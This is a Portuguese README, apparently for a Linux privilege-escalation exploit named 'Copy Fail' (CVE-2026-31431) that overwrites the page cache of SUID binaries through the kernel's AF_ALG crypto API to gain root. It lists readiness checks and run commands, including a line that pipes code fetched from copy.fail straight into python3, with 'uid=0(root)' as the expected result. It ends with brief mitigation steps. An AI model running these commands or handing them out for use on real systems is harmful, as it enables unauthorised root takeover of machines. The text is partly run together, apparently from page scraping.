
Exploit local de escalonamento de privilégios no Linux para CVE-2026-31431, sobrescrevendo o page cache de binários SUID através da API de criptografia do kernel AF_ALG para obter acesso root.
Este conteúdo é apenas para fins educacionais e de testes de segurança autorizados. NÃO execute isto em sistemas sem permissão explícita.
Copy Fail (CVE-2026-31431) é uma vulnerabilidade de Escalação de Privilégios Local (LPE) no Linux que afeta a API de criptografia do kernel via AF_ALG.
Permite que um usuário sem privilégios sobrescreva dados do page cache de um binário SUID (por exemplo, /usr/bin/su) e obtenha acesso root.
AF_ALG habilitadoalgif_aead carregadoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicadores esperados:
authencesn(hmac(sha256),cbc(aes))algif_aead carregadopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Resultado esperado:
uid=0(root)
os.splice not foundCausa:
Solução:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Causas possíveis:
Instale as ferramentas necessárias:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Atualize seu sistema:
apt update && apt upgrade
Se o exploit falhar, considere:
Use este exploit com responsabilidade apenas em laboratórios, CTFs e pentests autorizados.